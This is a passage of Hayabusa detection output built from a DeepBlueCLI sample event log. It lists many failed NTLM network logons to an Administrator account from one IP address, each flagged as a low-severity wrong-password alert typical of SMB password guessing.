NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mNlWZ9o0xf7bl2d0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnPnB2lEN3BSDpXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVMyeF9jGuzHkTHg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sDKLl3PjW2qrzJGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkllnePSq3NQ5wgC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9qLWgQnR7P9cs7s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1AdU07nzvv7RB2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cHgiB5SMiQtsl5oD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 03e7QOn36l0jH35H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DoJBywV8x8cURwrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDYGYO6s6g6Dbx8r : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nUqXpeTNePFyBmCo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2h0qJWcbzRe1GSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edsfNOovOl1Ow503 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cxCC83XLMIJrNMvl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzussOcg5ihdrnD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 55l4HKICu8x0FpQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5GmlVWDjZ75tT08G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6v1DkuFvB04PESQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTLdNb0XbzXuLi51 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSjDYb1BhHC9UTxO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1yLH19VsfLx9BGF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4AVhjdz9yHsfss0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqWLOKaKwS8VBxDj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjK8A8DTSYursBzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaDCKPslwRaLBWtH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAvoekviFDSAIgBe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3XOmFwh8IamESWCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 54GbW769j1x27mrI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bZSkhwZXc1SSknDT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 05AuqlN44x7oJGoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ4A6ReTVTcFCFeN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T7U6i4CMrL0bHouf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaeA4uZ6o8BRbzwf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MEnlL5BHmlCrtk7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNMpwAAaTsyzPfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oBtHQkRWIoq5hfn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5pkk9lgqMQ4wxQel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQVan7kRDOlnim50 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9282GqsC7UiUMbRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3lj7GjYryW9wjGgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPy4iUy5WBSLUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kvD9DEuos8SRrLH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NH1EnMG6fTvcz4QR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqHDXSQn8gkl2LJy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWI9XDDHjs2xcNB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zo53mEz6nal5Gxff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtOgC6wqMoNYVxId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdadoJYvD7DYjlSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U1xjdqjT9h0KUqG2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfkzZBvO4onYx6JZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JqY8CvyODDLQV9Ps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPMRIxRVuh13jmZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jARkTWdKTfTIwlug : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zwhkc71Nfn7QDf7c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qsYad9PgEajlYqvo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9YPw0DsspVbrOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsHpLCOdAOPFM6nD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcNytOhGOZKaREL9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lc5boBVigHE1ccGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQXg4ZHdBYHyiTTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JebTJzyn91NrpvkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wCE5ypjEU5feEEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OglsROoqX48xm0gJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bNC9ES3l3KwXPxb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: byPavQuiscMm7CMW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQESAC3XpxCJJfG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5aYRnzirSj0PNXAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8s9xJ659geFHOlY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yBQdyO0diiFixwlx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzULtccOFnLIRiVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pDEGzqTAyUab5P8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gomgb26W9qFacRr7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXOcDu88S5c5VwwV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WHRnzgQkfAhsUguj : IP Address: 192.168.198.149 : AuthPackage: 